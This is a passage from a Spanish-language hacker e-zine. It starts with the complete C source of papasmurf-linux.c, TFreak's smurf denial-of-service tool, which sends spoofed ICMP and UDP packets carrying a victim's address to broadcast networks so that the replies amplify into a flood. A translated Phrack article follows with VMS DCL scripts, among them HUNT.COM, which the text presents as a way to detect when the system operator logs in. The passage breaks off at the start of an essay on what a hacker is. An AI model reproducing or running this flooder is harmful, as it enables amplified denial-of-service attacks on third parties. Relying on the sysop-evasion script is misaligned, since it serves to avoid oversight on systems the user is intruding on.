    ip->ip_ttl = 255;
    ip->ip_off = 0;
    ip->ip_id = FIX( getpid() );
    ip->ip_p = IPPROTO_UDP;
    ip->ip_sum = 0;
    ip->ip_src.s_addr = sm->sin.sin_addr.s_addr;
    ip->ip_dst.s_addr = dst;

    /* fill in UDP header */
    if (sm->srcport) udp->uh_sport = htons(sm->srcport);
    else udp->uh_sport = htons(rand());
    if (sm->rnd) udp->uh_dport = htons(rand());
    else udp->uh_dport = htons(sm->dstport[n]);
    udp->uh_ulen = htons(sizeof(struct udphdr) + sm->psize);
//    udp->uh_sum = in_chksum((u_short *)udp, sizeof(udp));

    /* send it on its way */
    if (sendto(sm->s, packet, pktsize, 0, (struct sockaddr *) &sm->sin,
        sizeof(struct sockaddr)) == -1)
    {
	perror("sendto()");
	exit(-1);
    }

    free(packet);				/* free willy! */
}

u_short
in_chksum (u_short *addr, int len)
{
    register int nleft = len;
    register u_short *w = addr;
    register int sum = 0;
    u_short answer = 0;

    while (nleft > 1) 
    {
        sum += *w++;
        nleft -= 2;
    }

    if (nleft == 1) 
    {
        *(u_char *)(&answer) = *(u_char *)w;
        sum += answer;
    }

    sum = (sum >> 16) + (sum + 0xffff);
    sum += (sum >> 16);
    answer = ~sum;
    return(answer);
}

------------ FIN -------------------------------------------------------------

  --- papasmurf-linux.c v5.0 ---

------------ Codigo Fuente ---------------------------------------------------

/*
 *  (papa)smurf.c v5.0 by TFreak (Linux header version)
 *
 *  To compile: "gcc -o smurf5 papasmurf-linux.c" 
 *  
 *  NOTE: This version is Linux specific.
 *
 */
                            
#include <stdio.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <arpa/inet.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#include <time.h>
#ifdef __USE_BSD
#undef __USE_BSD
#endif
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <netinet/udp.h>

struct smurf_t
{
    struct sockaddr_in sin;                    /* socket prot structure */
    int s;                                     /* socket */
    int udp, icmp;                             /* icmp, udp booleans */
    int rnd;                                   /* Random dst port boolean */
    int psize;                                 /* packet size */
    int num;                                   /* number of packets to send */
    int delay;                                 /* delay between (in ms) */
    u_short dstport[25+1];                     /* dest port array (udp) */
    u_short srcport;                           /* source port (udp) */
    char *padding;                             /* junk data */
};

/* function prototypes */
void usage (char *);
u_long resolve (char *);
void getports (struct smurf_t *, char *);
void smurficmp (struct smurf_t *, u_long);
void smurfudp (struct smurf_t *, u_long, int);
u_short in_chksum (u_short *, int);

int 
main (int argc, char *argv[])
{
    struct smurf_t sm;
    struct stat st;
    u_long bcast[1024];
    char buf[32];
    int c, fd, n, cycle, num = 0, on = 1; 
    FILE *bcastfile;

    /* shameless self promotion banner */
    fprintf(stderr, "\n(papa)smurf.c v5.0 by TFreak\n\n");

    if (argc < 3) 
        usage(argv[0]);

    /* set defaults */
    memset((struct smurf_t *) &sm, 0, sizeof(sm));
    sm.icmp = 1;
    sm.psize = 64;
    sm.num = 0;
    sm.delay = 10000;
    sm.sin.sin_port = htons(0);
    sm.sin.sin_family = AF_INET;
    sm.srcport = 0;
    sm.dstport[0] = 7;

    /* resolve 'source' host, quit on error */
    sm.sin.sin_addr.s_addr = resolve(argv[1]);

    /* open the broadcast file */
    if ((bcastfile = fopen(argv[2], "r")) == NULL)
    {
        perror("Opening broadcast file");
        exit(-1);
    }

    /* parse out options */
    optind = 3;
    while ((c = getopt(argc, argv, "rRn:d:p:P:s:S:f:")) != -1)
    {
	switch (c)
	{
	    /* random dest ports */
	    case 'r':
		sm.rnd = 1;
		break;

	    /* random src/dest ports */
	    case 'R':
		sm.rnd = 1;
                sm.srcport = 0;
		break;

	    /* number of packets to send */
	    case 'n':
		sm.num = atoi(optarg);
		break;

	    /* usleep between packets (in ms) */
	    case 'd':
		sm.delay = atoi(optarg);
		break;

	    /* multiple ports */
	    case 'p':
		if (strchr(optarg, ',')) 
		    getports(&sm, optarg);
		else
		    sm.dstport[0] = (u_short) atoi(optarg);
		break;

	    /* specify protocol */
	    case 'P':
		if (strcmp(optarg, "icmp") == 0)
		{
		    /* this is redundant */
		    sm.icmp = 1;
		    break;
		}
		if (strcmp(optarg, "udp") == 0)
		{
		    sm.icmp = 0;
		    sm.udp = 1;
		    break;
		}
		if (strcmp(optarg, "both") == 0)
		{
		    sm.icmp = 1;
		    sm.udp = 1;
		    break;
		}

		puts("Error: Protocol must be icmp, udp or both");
		exit(-1);

	    /* source port */
	    case 's':
		sm.srcport = (u_short) atoi(optarg);
		break;

	    /* specify packet size */
	    case 'S':
		sm.psize = atoi(optarg);
		break;

	    /* filename to read padding in from */
	    case 'f':
		/* open and stat */
		if ((fd = open(optarg, O_RDONLY)) == -1)
		{
		    perror("Opening packet data file");
		    exit(-1);
		}
		if (fstat(fd, &st) == -1)
		{
		    perror("fstat()");
		    exit(-1);
		}

		/* malloc and read */
		sm.padding = (char *) malloc(st.st_size);
		if (read(fd, sm.padding, st.st_size) < st.st_size)
		{
		    perror("read()");
		    exit(-1);
		}

		sm.psize = st.st_size;
		close(fd);
		break;

            default:
                usage(argv[0]);
        }
    } /* end getopt() loop */
	    
    /* create packet padding if neccessary */
    if (!sm.padding)
    {
	sm.padding = (char *) malloc(sm.psize);
	memset(sm.padding, 0, sm.psize);
    }

    /* create the raw socket */
    if ((sm.s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1)
    {
	perror("Creating raw socket (are you root?)");
	exit(-1);
    }

    /* Include IP headers ourself (thanks anyway though) */
  if (setsockopt(sm.s, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) == -1)
    {
	perror("setsockopt()");
	exit(-1);
    }

    /* read in our broadcasts and store them in our array */
    while (fgets(buf, sizeof buf, bcastfile) != NULL)
    {
	char *p;
	int valid;

        /* skip over comments/blank lines */
        if (buf[0] == '#' || buf[0] == '\n') continue;

        /* get rid of newline */ 
        buf[strlen(buf) - 1] = '\0';

        /* check for valid address */
        for (p = buf, valid = 1; *p != '\0'; p++)
        {
            if ( ! isdigit(*p) && *p != '.' ) 
            {
                fprintf(stderr, "Skipping invalid ip %s\n", buf);
                valid = 0;
                break;
            }
        }

        /* if valid address, copy to our array */
        if (valid)
        {
	    bcast[num] = inet_addr(buf);
            num++;
	    if (num == 1024)
		break;
        }
    } /* end bcast while loop */

    /* seed our random function */
    srand(time(NULL) * getpid());

    /* wee.. */
    for (n = 0, cycle = 0; n < sm.num || !sm.num; n++)
    {
	if (sm.icmp)
	    smurficmp(&sm, bcast[cycle]);

	if (sm.udp)
	{
	    int x;
	    for (x = 0; sm.dstport[x] != 0; x++)
	        smurfudp(&sm, bcast[cycle], x);
	}

	/* quick nap */
	usleep(sm.delay);

	/* cosmetic psychadelic dots */
	if (n % 50 == 0)
	{
	    printf(".");
	    fflush(stdout);
	}

	cycle = (cycle + 1) % num;
    }

    exit(0);
}

void 
usage (char *s)
{
    fprintf(stderr,
            "usage: %s <source host> <broadcast file> [options]\n"
	    "\n"
	    "Options\n"
	    "-p:	Comma separated list of dest ports (default 7)\n"
	    "-r:	Use random dest ports\n"
	    "-R:	Use random src/dest ports\n"
	    "-s:	Source port (0 for random (default))\n"
	    "-P:	Protocols to use.  Either icmp, udp or both\n"
	    "-S:	Packet size in bytes (default 64)\n"
	    "-f:	Filename containg packet data (not needed)\n"
	    "-n:	Num of packets to send (0 is continuous (default))\n"
	    "-d:	Delay inbetween packets (in ms) (default 10000)\n"
	    "\n", s);
    exit(-1);
}

u_long 
resolve (char *host)
{
    struct in_addr in;
    struct hostent *he;

    /* try ip first */
    if ((in.s_addr = inet_addr(host)) == -1)
    {
	/* nope, try it as a fqdn */
	if ((he = gethostbyname(host)) == NULL)
	{
	    /* can't resolve, bye. */
            herror("Resolving victim host");
	    exit(-1);
	}

	memcpy( (caddr_t) &in, he->h_addr, he->h_length);
    }

    return(in.s_addr);
}

void 
getports (struct smurf_t *sm, char *p)
{
    char tmpbuf[16];
    int n, i;

    for (n = 0, i = 0; (n < 25) && (*p != '\0'); p++, i++)
    {
	if (*p == ',')
	{
            tmpbuf[i] = '\0';
	    sm->dstport[n] = (u_short) atoi(tmpbuf);
	    n++; i = -1;
	    continue;
	}

	tmpbuf[i] = *p;
    }
    tmpbuf[i] = '\0';
    sm->dstport[n] = (u_short) atoi(tmpbuf);
    sm->dstport[n + 1] = 0;
}

void
smurficmp (struct smurf_t *sm, u_long dst)
{
    struct iphdr *ip;
    struct icmphdr *icmp;
    char *packet;

    int pktsize = sizeof(struct iphdr) + sizeof(struct icmphdr) + sm->psize;

    packet = malloc(pktsize);
    ip = (struct iphdr *) packet;
    icmp = (struct icmphdr *) (packet + sizeof(struct iphdr));

    memset(packet, 0, pktsize);

    /* fill in IP header */
    ip->version = 4;
    ip->ihl = 5;
    ip->tos = 0;
    ip->tot_len = htons(pktsize);
    ip->id = htons(getpid());
    ip->frag_off = 0;
    ip->ttl = 255;
    ip->protocol = IPPROTO_ICMP;
    ip->check = 0;
    ip->saddr = sm->sin.sin_addr.s_addr;
    ip->daddr = dst;

    /* fill in ICMP header */
    icmp->type = ICMP_ECHO;
    icmp->code = 0;
    icmp->checksum = htons(~(ICMP_ECHO << 8));	/* thx griffin */

    /* send it on its way */
    if (sendto(sm->s, packet, pktsize, 0, (struct sockaddr *) &sm->sin,
        sizeof(struct sockaddr)) == -1)
    {
	perror("sendto()");
	exit(-1);
    }

    free(packet);					/* free willy! */
}

void
smurfudp (struct smurf_t *sm, u_long dst, int n)
{
    struct iphdr *ip;
    struct udphdr *udp;
    char *packet, *data;

    int pktsize = sizeof(struct iphdr) + sizeof(struct udphdr) + sm->psize;

    packet = (char *) malloc(pktsize);
    ip = (struct iphdr *) packet;
    udp = (struct udphdr *) (packet + sizeof(struct iphdr));
    data = (char *) (packet + sizeof(struct iphdr) + sizeof(struct udphdr));

    memset(packet, 0, pktsize);
    if (*sm->padding)
        memcpy((char *)data, sm->padding, sm->psize);

    /* fill in IP header */
    ip->version = 4;
    ip->ihl = 5;
    ip->tos = 0;
    ip->tot_len = htons(pktsize);
    ip->id = htons(getpid());
    ip->frag_off = 0;
    ip->ttl = 255;
    ip->protocol = IPPROTO_UDP;
    ip->check = 0;
    ip->saddr = sm->sin.sin_addr.s_addr;
    ip->daddr = dst;

    /* fill in UDP header */
    if (sm->srcport) udp->source = htons(sm->srcport);
    else udp->source = htons(rand());
    if (sm->rnd) udp->dest = htons(rand());
    else udp->dest = htons(sm->dstport[n]);
    udp->len = htons(sizeof(struct udphdr) + sm->psize);
//    udp->check = in_chksum((u_short *)udp, sizeof(udp));

    /* send it on its way */
    if (sendto(sm->s, packet, pktsize, 0, (struct sockaddr *) &sm->sin,
        sizeof(struct sockaddr)) == -1)
    {
	perror("sendto()");
	exit(-1);
    }

    free(packet);				/* free willy! */
}

u_short
in_chksum (u_short *addr, int len)
{
    register int nleft = len;
    register u_short *w = addr;
    register int sum = 0;
    u_short answer = 0;

    while (nleft > 1) 
    {
        sum += *w++;
        nleft -= 2;
    }

    if (nleft == 1) 
    {
        *(u_char *)(&answer) = *(u_char *)w;
        sum += answer;
    }

    sum = (sum >> 16) + (sum + 0xffff);
    sum += (sum >> 16);
    answer = ~sum;
    return(answer);
}

------------ FIN -------------------------------------------------------------

  5.- Creditos
  ------------

        Bueno, pues por ahora se acabo lo que se daba, espero que os haya sido
  util, nada mas. Saludos a TFreak por el codigo fuente, al grupo y a todos
  los que me han ayudado a hacer este articulo y buscar informacion sobre el,
  a todos, gracias.

        para mas informacion, criticas, lo que sea: mac@jjf.org

<>

<>
                          
                   Utilidades DCL para el hacker de VMS
                   >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
                                   por
                                The Mentor
                    (Traducido y modificado por EiVoL)

                     Trucos especiales por Spy Silver

        Los comandos DCL son un lenguaje extremadamente poderoso, aqui tengo
  una seleccion de las utilidades que no solo pueden ayudar a los hackers,
  tambien son un buen ejemplo de programacion en DCL.

			Vistazo preliminar de DCL

        Hay muchos documentos de DCL (Los Documentos de ayuda de VMS estan en
  los mejores sitios para encontrar informacion) para poder usar este codigo 
  fuente en un VMS copia la secion de texto en tu editor de texto favorito
  baja la fila al Vax y renombra la fila como .com, haora es una fila DCL las
  filas DCL se ejecutan con la @ ($@FILA) tambien puedes correrlo en un
  proceso separado (algo asi como el & en linux) la sintaxis es $SPAWN/NOWAIT
  @FILA, Nota del traductor: SPAWN es un comando que permite crear un
  Subproceso para ejecutar un comando de VMS, si ponemos la opcion /NOWAIT el
  proceso correra en paralelo con el creador,pero si muere el proceso padre,
  el proceso acabara su ejecucion, para interrumpir cualquier comando en un
  VMS se usa CTRL + Y.

			  Tabla de contenidos
			  <<<<<<<<<<<<<<<<<<<

  1 CD.DOC  Esta es la documentacion del CD.COM.
  2 CD.COM  utilidad para cambiar de directorio como el CD de PC.
  3 HUNT.COM Busca un nodo especifico de un usuario, se usa para alertarte de
    la presencia del Sysop.
  4 ALARM.COM es una alarma de reloj muy util.
  5 CGO.COM  Esto te avisa si alguien compila y corre un programa en c.

	CD.COM Version 5.0 VMS Comando de cambio de directorio
	<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<

  Esto es muy parecido al comando CD de MS-DOS:

  CD - Esto muestra tu directorio home los demas directorios y en nombre del
       nodo, es similar al comando SHOW de VMS.

  CD DIRECTORIO - Esto te mueve al directorio elegido.

  CD SUBDIRECTORIO - Esto te pone en el subdirectorio egejido.

  CD \ - Este t pondra en tu directorio principal (home).

  CD HOME - Me mueve al directorio donde tengas tu login.

  CD SYS$LOGIN - Es como el comando SET DEFAULT SYS$LOGIN en VMS.

  CD .. - Creo que este ya te lo puedes imaginar.

  CD . - Resetea al directorio anterior.

  CD * - Selecciona el subdirectorio a mover de la lista de subdirectorios.

  CD ? - Te muestra la ayuda del CD-COM.

        Para navegar por los directorios de un VMS se usa le comando SET
  DEFAULT. Esto es mas elegante, tu no puedes cambiar a directorios que no
  existen. Si al pasar a un directorio sale [DIRECTORIO] Directory does not
  exist! ya te puedes imaginar lo que pasa. y ahora el codigo :)

------------ Codigo Fuente ---------------------------------------------------

$! CD.COM v6.09
$! The Ultimate Change Directory Command.
$!
$  hdir     = f$trnlnm("SYS$LOGIN")                 ! Home Directory
$  ndir     = f$edit(p1,"UPCASE")                   ! New  Directory
$  odir     = f$environment("DEFAULT")              ! Old  Directory
$  prompton = (f$edit(f$trnlnm("SYS$PROMPT"),"UPCASE") .eqs. "ON")
$!
$  if (ndir .eqs. "")           then goto DISPLAY   ! No Dir
$  if (ndir .eqs. "*")          then goto DIRSEARCH ! Search for Dirs
$  if (ndir .eqs. "?")          then goto HELP      ! Instructions
$!
$  PARSE:
$  length   = f$length(ndir)                        ! Fix up ndir
$  if (f$location("@",ndir) .eq. 0) .or. -
      (f$location("$",ndir) .eq. 0) then ndir = f$extract(1, length - 1, ndir)
$  right    = f$location("]",ndir) + 1
$  if (right .gt. length) then right = f$location(">", ndir)
$  if (right .le. length) then ndir  = f$extract(0, right, ndir)
$!
$  if (f$trnlnm(ndir) .eqs. "") then goto CASESYM   ! Not Logical Name
$     ndir   = f$trnlnm(ndir)                       ! Logical Name
$     goto PARSE
$!
$  CASESYM:
$  if ("''&ndir'" .eqs. "")     then goto CASE0     ! Not Symbol
$     ndir = 'ndir'                                 ! Symbol
$     goto PARSE
$!
$  CASE0:
$  len_ndir = f$length(ndir)                        ! Regular Dir
$  if (f$location("[", ndir) .lt. len_ndir) .or. -
      (f$location("<", ndir) .lt. len_ndir) then goto SETDIR
$!
$  CASE1:                                           ! Home Dir
$  if ((ndir .nes. "HOME") .and. (ndir .nes. "\")) then goto CASE2
$     ndir = hdir
$     goto SETDIR
$!
$  CASE2:                                           ! . .. .dir
$  if (f$location(".", ndir) .nes. 0) then goto CASE3
$     if (ndir .eqs. "..") then ndir = "-"
$     if (f$extract(0, 2, ndir) .eqs. "..") -
         then ndir = "-" + f$extract(1, len_ndir - 1, ndir)
$     ndir = "[" + ndir + "]"
$     if (ndir .eqs. "[.]") then ndir = odir
$     goto SETDIR
$!
$  CASE3:                                           ! :
$  if (f$location(":", ndir) .ge. len_ndir) then goto CASE4
$     left    = f$location(":", ndir) + 1
$     symbol  = f$extract(left, 1, ndir)
$     if (symbol .eqs. ":")  then goto CASE3B       ! :: Node
$     if ((symbol .eqs. "[") .or. (symbol .eqs. "<")) then goto SETDIR
$        ndir = f$extract(0, left, ndir) + "[" -
              + f$extract(left, len_ndir - left+1, ndir) + "]"
$     goto SETDIR
$!
$  CASE3B:                                          ! NODE::nothing
$  if (f$length(ndir)-1 .gt. left) then goto CASE3C
$     ndir = ndir + "[000000]"
$     goto SETDIR
$!
$  CASE3C:                                          ! NODE::directory
$  if ((f$location("[", ndir) - f$location("<", ndir)) .ne. 0) -
      then goto SETDIR
$
$     ndir = f$parse(ndir,,,"NODE") + "[" + f$parse(ndir,,,"NAME") + "]"
$     goto SETDIR
$!
$  CASE4:                                           ! dir
$  ndir = "[" + ndir + "]"
$!
$  SETDIR:
$  set default 'ndir'
$  if (f$parse("") .eqs. "") then goto DIRERROR
$!
$  DISPLAY:
$  if ((ndir .nes. "") .and. prompton) then goto NODISPLAY
$     hnode = f$getsyi("NODENAME")
$     cnode = f$parse(f$trnlnm("SYS$DISK"),,,"NODE") - "::"
$     if (cnode .eqs. "") then cnode = hnode
$     cdir  = f$environment("DEFAULT")
$     write sys$output " "
$     write sys$output "          Home Node: ", hnode
$     write sys$output "     Home Directory: ", hdir
$     if (cdir .eqs. hdir) .and. (cnode .eqs. hnode) then goto DISPSKIP
$     write sys$output "       Current Node: ", cnode
$     write sys$output "  Current Directory: ", cdir
$  DISPSKIP:
$     write sys$output " "
$!
$  NODISPLAY:
$  ndir = f$environment("DEFAULT")
$  if .not. prompton then goto END
$!
$  if (f$length(ndir) .ge. 32) then goto TOOLONG
$!
$  SETPROMPT:
$  set prompt = 'ndir'" "
$!
$  END:
$  exit
$!
$  DIRERROR:
$  write sys$output " "
$  write sys$output "          ", ndir, " Directory does not exist!"
$  write sys$output " "
$  set default 'odir'
$  ndir = odir
$  goto NODISPLAY
$!
$! Prompt Problems------------------------------------------------------------
$!
$  TOOLONG:
$! Prompt is too long. Get rid of everything to the left of [ or <. If that
$! doesn't work, get rid of a subdirectory at a time.  As a last resort,
$! set the prompt back to $.
$!
$  left     = f$location("[", ndir)
$  len_ndir = f$length(ndir)
$  if (left .ge. len_ndir) then left = f$location("<",ndir)
$  if (left .gt. 0) .and. (left .lt. len_ndir) -
      then ndir = f$extract(left, len_ndir - left, ndir)
$!
$  STILLTOOLONG:
$    if (f$length(ndir) .lt. 32) then goto SETPROMPT
$    left     = f$location(".", ndir) + 1
$    len_ndir = f$length(ndir)
$    if left .ge. len_ndir then ndir = "$ "
$    if left .ne. len_ndir -
        then ndir = "[*" + f$extract(left, len_ndir - left, ndir)
$    goto STILLTOOLONG
$!
$! Wildcard Directory---------------------------------------------------------
$!
$  DIRSEARCH:
$  error_message = f$environment("MESSAGE")
$  on control_y then goto DIREND
$  on control_c then goto DIREND
$  set message/nosev/nofac/noid/notext
$  write sys$output " "
$  dispct = 1
$  dirct  = 0
$  pauseflag = 1
$!
$  DIRLOOP:
$    userfile = f$search("*.dir")
$    if (userfile .eqs. "") .and. (dirct .ne. 0) then goto DIRMENU
$    if (userfile .eqs. "") then goto DIRNONE
$    dispct = dispct + 1
$    dirct  = dirct  + 1
$    on severe then $ userprot = "No Priv"
$    userprot = f$file_attributes(userfile,"PRO")
$    if userprot .nes. "No Priv" then userprot = " "
$    userfile'dirct' = "[." + f$parse(userfile,,,"NAME") + "]"
$    userprot'dirct' = userprot
$    lengthflag = (f$length(userfile'dirct') .gt. 18)
$    if lengthflag then write sys$output -
        f$fao("  !3SL   !34AS  ", dirct, userfile'dirct'), userprot'dirct'
$    if (.not. lengthflag) then write sys$output -
        f$fao("  !3SL   !20AS  ", dirct, userfile'dirct'), userprot'dirct'
$    if (dispct .lt. 8) then goto DIRLOOP
$    dirct  = dirct  + 1
$    userfile'dirct' = ""
$    dirct  = dirct  + 1
$    userfile'dirct' = ""
$    if pauseflag then goto DIRMENU
$    dispct = 0
$    goto DIRLOOP
$!
$  DIRMENU:
$  write sys$output " "
$  if (userfile .eqs. "") then goto DIRMENU2
$     write sys$output "    M   More subdirectories"
$  if pauseflag then -
$     write sys$output "    N   More subdirectories/No pause"
$!
$  DIRMENU2:
$     write sys$output "    R   Re-Display subdirectories"
$     write sys$output "    Q   Quit (default)"
$
$  DIRINQUIRE:
$  write sys$output " "
$  inquire dirchoice "  Select One"
$  write sys$output " "
$!
$  if (dirchoice .gt. 0)    .and. -
      (dirchoice .le. dirct) then goto DIRCASEDIGIT
$  dirchoice = f$edit(dirchoice,"UPCASE")
$  if (dirchoice .eqs. "")  .or. -
      (dirchoice .eqs. "Q")  then goto DIRCASEBLANK
$  if (dirchoice .eqs. "M") .or. -
      (dirchoice .eqs. "N")  then goto DIRCASEMORE
$  if (dirchoice .eqs. "R")  then goto DIRCASERED
$!
$  DIRCASERROR:
$  if (dirct .eq. 1)   then write sys$output -
      "  Select 1 to change to the ", userfile1, " subdirectory. "
$  revdirct = dirct
$  if (dispct .eq. 8) then revdirct = revdirct - 2
$  if (dirct .gt. 1)   then write sys$output -
      "  Valid subdirectory selections are 1 through ", revdirct, " (Octal)."
$  goto DIRINQUIRE
$!
$  DIRCASEDIGIT:
$  if (userfile'dirchoice' .eqs. "") then goto DIRCASERROR
$  ndir = userfile'dirchoice'
$  goto DIREND
$!
$  DIRCASEBLANK:
$  write sys$output "  Subdirectory not changed."
$  write sys$output " "
$  goto DIREND
$!
$  DIRCASEMORE:
$  dispct = 0
$  if (dirchoice .eqs. "N") then pauseflag = 0
$  if (userfile .nes. "")   then goto DIRLOOP
$  write sys$output "  No more subdirectories to display."
$  goto DIRINQUIRE
$!
$  DIRCASERED:
$  dispct = 1
$  DISPLOOP:
$     if (userfile'dispct' .eqs "") then goto DISPDONT
$     lengthflag = (f$length(userfile'dispct') .gt. 18)
$     if lengthflag then write sys$output -
         f$fao("  !3SL   !34AS  ", dispct, userfile'dispct'), userprot'dispct'
$     if (.not. lengthflag) then write sys$output -
         f$fao("  !3SL   !20AS  ", dispct, userfile'dispct'), userprot'dispct'
$     DISPDONT:
$     dispct = dispct + 1
$     if (dispct .le. dirct) then goto DISPLOOP
$  goto DIRMENU
$!
$  DIRNONE:
$  write sys$output "No subdirectories to choose, or no directory privileges."
$  write sys$output " "
$  goto DIREND
$!
$  DIREND:
$  set message 'error_message'
$  on control_y then exit
$  on control_c then exit
$  if (ndir .eqs. "*") then goto DISPLAY
$  goto PARSE
$!
$!-Help-----------------------------------------------------------------------
$!
$  HELP:
$  type sys$input

               CD.COM  Version 6  VMS Change Directory Command

                         Usage:  CD command/directory

CD         Display home directory,       CD ..       Change directory to the
           current directory, node.      CD [-]      dir above current dir.

CD \       Change directory to your      CD ..sub    Change directory to a
CD HOME    SYS$LOGIN directory.          CD [-.sub]  "sideways" subdirectory.

CD dir     Change directory to the       CD *        Display/select the
CD [dir]   [dir] directory.                          available subdirectories.

CD .sub    Change directory to the       CD .        Reset current directory.
CD [.sub]  [.sub] subdirectory.          CD ?        Display CD instructions.

     CD :== @SYS$LOGIN:CD.COM                 DEFINE SYS$PROMPT "ON"
     To make CD available from                To have the VMS $ prompt
     any directory you change to.             display the current directory.

                              By The Mentor
$  goto END

------------ FIN -------------------------------------------------------------

  CODIGO DEL HUNT.COM
  <<<<<<<<<<<<<<<<<<<

------------ Codigo Fuente ---------------------------------------------------

$ ! HUNT.COM
$ ! By The Mentor
$ ! Updated by: The Mad Mexican
$ ! Usage: SPAWN/NOWAIT @HUNT
$ !
$ !Searches SHOW USER output for a specified user,  strobes at given
$ !intervals considering the severity of the hunt at which time output
$ !is generated and process terminates. If user loggs in then output
$ !is generated and process terminates. May check both nodes if a set
$ !host is called.  Also supports a file with the names to be hunted for.
$ !
$ !  *** NOTE ***   This is set up for a two-node system with NYSSA
$ !                 being the default node and TEGAN being the alternate
$ !                 node (Circuit Breaker and some others will recognize
$ !                 the nodes as my 'home' ones.)  You will need to
$ !                 slightly modify the code to reflect the nodename(s)
$ !                 of whatever system you are using...
$ !
$ !
$ !
$ say="write sys$output"
$ on control then goto door
$ monitored_node = "''NODE'"
$ say "Monitoring node ''monitored_node'.  "
$ severity_of_hunt:
$ inquire selection "Severity of HUNT, 1 being the most urgent: 1-2-3"
$ if selection.ge.2 then goto selection_2
$ delay="wait 00:00:20"
$ loop_count=40
$ goto begin_process
$ selection_2:
$ if selection.eq.3 then goto selection_3
$ delay="wait 00:01:00"
$ loop_count=8
$ goto begin_process
$ if selection.gt.3 then goto severity_of_hunt
$ delay="wait 00:02:30"
$ loop_count=20
$ begin_process:
$ if monitored_node.eqs."TEGAN" then goto search_file_tegan
$ if f$search("nyssa.dat9") .nes. "" then goto file_exist
$ goto continue
$ search_file_tegan:
$ if f$search("tegan.dat9") .nes. "" then goto file_exist
$ continue:
$ say "hit "
$ inquire/nopunctuate choice9 "Who are we hunting for? "
$ if choice9 .eqs. "" then exit
$ count = 0
$ bell_sound[0,8]=%X07
$ top:
$ sho user/output='monitored_node'.dat9
$ purge 'monitored_node'.dat9
$ set message/nofac/noid/notext/nosev
$ search 'monitored_node'.dat9 'choice9'
$ a=$severity
$ if a .eqs. "1" then goto found_user
$ set message 'temp_msg9'
$ count = count + 1
$ if count .ge. 'loop_count' then goto give_up
$ delay
$ goto top
$ file_exist:
$ say "ERROR - Could not create temporary data file."
$ say "Please delete or rename ''NODE'.DAT9"
$ exit
$ found_user:
$ say bell_sound
$ say "''choice9' is now online on node ''monitored_node'."
$ say bell_sound
$ goto door
$ give_up:
$ say " "
$ say "''choice9' has not yet logged in on ''monitored_node'."
$ door:
$ say bell_sound
$ say "HUNT routine has terminated on node ''monitored_node'."
$ delete/noconfirm/nolog 'monitored_node'.dat9;*
$ set message 'temp_msg9'
$ exit

------------ FIN -------------------------------------------------------------

  CODIGO DEL ALARM.COM
  <<<<<<<<<<<<<<<<<<<<

------------ Codigo Fuente ---------------------------------------------------

$ ! ALARM.COM
$ ! By The Mentor
$ ! Usage: SPAWN/NOWAIT @ALARM
$ ! Strobes f$time() every 5 seconds until specified time
$ ! is met at which time output is generated and process terminates.
$ CLR = " "
$ count = 0
$ PID           = F$PID(CONTEXT)
$ TERMINAL      = F$GETJPI(''PID',"TERMINAL")
$ DEVICE        = F$GETDVI(TERMINAL,"DEVTYPE")
$ IF DEVICE .EQS. 110 THEN CLR = "[H[2J"  ! VT220
$ IF DEVICE .EQS.  98 THEN CLR = "[H[2J"  ! VT102
$ IF DEVICE .EQS.  96 THEN CLR = "[H[2J"  ! VT100
$ IF DEVICE .EQS.  64 THEN CLR = "HJ"     ! VT52
$ CLS = "WRITE SYS$OUTPUT CLR"
$ DATE       = F$CVTIME(F$TIME())
$ NODE       = F$GETSYI("NODENAME")
$ bell[0,8]=%X07
$ ON CONTROL THEN GOTO DOOR
$ say = "write sys$output"
$ say f$cvtime(,,"TIME")
$ say " "
$ say "Hit (RETURN)"
$ say " "
$ inquire/nopunctuate alarm "What time shall I ring you - "
$ a_hour = f$element(0,":",alarm)
$ a_minute = f$element(1,":",alarm)
$ a_second = f$element(2,":",alarm)
$ time_check:
$ hour = f$element(0,":",f$cvtime(,,"TIME"))
$ minute = f$element(1,":",f$cvtime(,,"TIME"))
$ second = f$element(2,":",f$element(0,".",f$cvtime(,,"TIME")))
$ if hour .ge. a_hour .and. minute .ge. a_minute .and. second .ge.
  a_second then goto top
$ if hour .ge. a_hour .and. minute .ge. a_minute then goto top
$ wait 00:00:05
$ goto time_check
$ top:
$ count = count + 1
$ cls
$ say " "
$ say " "
$ say " "
$ say " "
$ say " "
$ say " "
$ say " "
$ say " "
$ say " "
$ say " "
$ say " "
$ say "                              A L A R M   O N"
$ say bell
$ say "                                 ",f$element(0,".",f$cvtime(,,"TIME"))
$ say " "
$ say " "
$ say " "
$ say " "
$ say " "
$ say " "
$ say " "
$ say " "
$ say " "
$ wait 00:00:01.50
$ if count .le. "6" then goto top
$ door:
$ say "ALARM OFF"
$ say f$element(0,".",f$cvtime(,,"TIME"))
$ say bell
$ exit

------------ FIN -------------------------------------------------------------

  CODIGO DEL CGO.COM
  <<<<<<<<<<<<<<<<<<

------------ Codigo Fuente ---------------------------------------------------

$! CGO.COM
$! By The Mentor
$! One-Line compile/link/execute of C programs
$! Usage: CGO :== @CGO.COM
$!        CGO filename
$!
$if p1 .nes. "" then c_filename :== 'p1
$ write sys$output "Compiling:"
$ cc 'c_filename/list='c_filename.lst
$ write sys$output "Linking:"
$ link 'c_filename ,options_file/opt
$ write sys$output "Running:"
$ assign/user sys$command sys$input
$ run 'c_filename
$ exit

------------ FIN -------------------------------------------------------------

        Bien, intentare traducir y adaptar otros textos de la Phrack que me
  interesen y distribuirlos a los proyectos de Raregazz y Underhack, este
  texto ha sido corregido y adaptado para poder ser entendidos por gente de
  todos los niveles pero si te interesa ver el original puedes verlo en la
  phrack19 es el 2#

        Saludos a los canales del irc Hispano #hack #hackers #hack_novatos y
  a todos los grupos H/P/C/V espaoles.
								        -E-

<>

<>

                          #############################
                          #                           #
                          #     Que es un hacker      #
                          #                           #  
                          #      By: Tasslehoff       #
                          #                           #
                          # - J.J.F. / Hackers Team - #
                          #                           #
                          #############################

        Tras la anaquia, que podemos pensar que es Internet, podemos encontrar
  un mundo complejo y completo, con sus culturas y sociedades. Este mundo,
